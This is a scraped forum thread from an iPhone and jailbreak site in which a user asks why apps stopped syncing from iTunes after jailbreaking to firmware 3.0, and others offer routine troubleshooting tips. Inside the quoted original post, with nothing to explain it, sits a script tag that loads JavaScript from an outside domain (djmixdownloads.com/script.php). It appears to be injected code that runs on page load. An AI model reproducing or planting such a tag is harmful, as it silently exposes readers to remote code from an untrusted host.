+ Reply

Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: HELP: Apps won't sync from iTunes.

is a discussion within the

Apple AppStore App Discussion

forums, a part of the

3rd Party Apps For iPhone | iPod Touch

section;
Ever since I upgraded err jailbroke to 3.0 my apps on my iTunes will not sync. Yes, I have it check mark in the apps tab, I even check specific
    Green Apple
    Thanks

Exclamation HELP: Apps won't sync from iTunes.
    Ever since I upgraded err jailbroke to 3.0 my apps on my iTunes will not sync. Yes, I have it check mark in the apps tab, I even check specific apps (instead of all) and it still won't sync. I've tried a million times and it's been going on for 3 weeks. I even try right clicking my phone and selecting "Transfer Purchases", nothing. BTW, it transfer my music, pictures perfectly fine. I had to re-download facebook from the App Store, but I had like 20+ apps and don't want to redownload them all if I can fix this problem, any help?

Another thing, I also notice that when the phone is done syncing a little message pops up and says something like "could not backup up phone because it has been disconnected" but it actually hasn't, it's still here, plug in. Does that have anything to do with it?

Green Apple
    Thanks

Wow, bump?

iPhoneaholic
    Thanks

If You can't synchronize some applications, check the following settings at first. Goto "Setting => General => Restrictions" and get your "New Applications" enabled.If it doesn't work,then you may uninstall all apple software and then again install iTunes 8.0.1.It may work for you.
    mod/edit links removed

Green Apple
    Thanks

Quote Originally Posted by Raadius View Post
    Ever since I upgraded err jailbroke to 3.0 my apps on my iTunes will not sync. Yes, I have it check mark in the apps tab, I even check specific apps (instead of all) and it still won't sync. I've tried a million times and it's been going on for 3 weeks. I even try right clicking my phone and selecting "Transfer Purchases", nothing. BTW, it transfer my music, pictures perfectly fine. I had to re-download facebook from the App Store, but I had like 20+ apps and don't want to redownload them all if I can fix this problem, any help?

Another thing, I also notice that when the phone is done syncing a little message pops up and says something like "could not backup up phone because it has been disconnected" but it actually hasn't, it's still here, plug in. Does that have anything to do with it?<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    What version of firmware do you have on your Touch? It needs to have at least 2.0 for apps to load. If you have a version that supports applications, then when you connect your Touch to iTunes look at the Summary page for your iPod -- you'll see a tab for Applications. There you can choose to sync all applications, or just selected ones.